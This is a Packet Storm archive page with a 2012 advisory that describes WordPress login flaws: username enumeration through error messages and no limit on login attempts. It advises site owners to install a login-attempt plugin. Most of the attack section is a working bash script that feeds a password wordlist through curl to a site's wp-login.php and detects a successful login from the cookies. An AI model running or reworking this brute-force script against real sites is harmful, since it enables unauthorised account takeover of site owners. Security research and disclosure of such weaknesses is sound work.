exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Bruteforce Script

WordPress Bruteforce Script
Posted Apr 29, 2012
Authored by CorryL

This is a simple bash script for bruteforcing WordPress.

tags | cracker, bash
SHA-256 | a04595fb1fae7483302800dc402320dae1656bd040d010c93927bb2d7e92208a

WordPress Bruteforce Script

Change Mirror Download
-=[--------------------ADVISORY-------------------]=-

WordPress BruteForce Script

Author: Corrado Liotta Aka CorryL [corryl80@gmail.com] #x0n3-h4ck will
never die#
-=[-----------------------------------------------]=-


-=[+] Application: WordPress
-=[+] Version: 3.2-3.3
-=[+] Vendor's URL: Wordpres.org
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: BruteForce
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
-=[+] +Google: https://plus.google.com/u/0/109396477464303670923

...::[ Descriprion ]::..

What I am about to describe is not a new thing, but I wanted to create
this simple script,
to show how easily it is possible to violate famous as a cms wordpress,
unfortunately like most of you know wordpress has some minor problems
related to the security module login,
in practice as you will see in the picture any user can discover a
user actually
exists simply trying to enter any passwords, because if the CMS
recognizes that the user is present
in the database but the password is wrong return this message "the
password for the admin user is not correct ",
so this makes us understand that the admin user exists,
and that you need only enter the correct password. Another small flaw
security of this CMS
is that it has no control on the default login attemps,
this allows a attaker do not want all the attempts that never stopped coming,
a TIP that I give to all those who use this cms is to install a plugin
for login attemps,
we find several directories inside the plugins wordpress.org




...::[ Proof Of Concept ]::..

Image: http://img832.imageshack.us/img832/4481/wordpressbrute.jpg

...::[ Script ]::..

#!/bin/bash
echo "Wordpress Bruteforcing By Corrado Liotta Aka CorryL"
# Questo script è stato creato a scopo illustrativo.
# Non mi ritengo responsabile sull'uso inappropriato.
# La violazione di sistema informatico non autorizzato
# è punibile per legge Art. 615 Ter
# Installa sul tuo blog wordpress un plugin per il login attemp.
echo "Username"; read USER;
echo "Wordlist Password"; read WLIST;
echo "Sito Web"; read WEB;


while read line
do
echo "---> TESTING ${line} per l'utente $USER"
curl --output test.html --cookie-jar c.cookie --data
"log=$USER&pwd=${line}&wp-submit=Collegati&redirect_to=http%3A%2F%2F$WEB%2Fwp-admin%2F&testcookie=1"
"http://$WEB/wp-login.php"
cat c.cookie>COOK
PARSE=$(cat test.html |grep "La password inserita per l'utente")
CHECK=$(cat COOK|grep "#HttpOnly")
if [ "$CHECK" != "" ]; then
echo "--> Utente $USER PASSWORD TROVATA ! --> ${line} "
break
else
echo "--> Utente $USER PASSWORD Non Trovata !"
fi


done < $WLIST



..::[ Disclousure Timeline ]::..

[29/04/2012] - Public Disclousure

Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close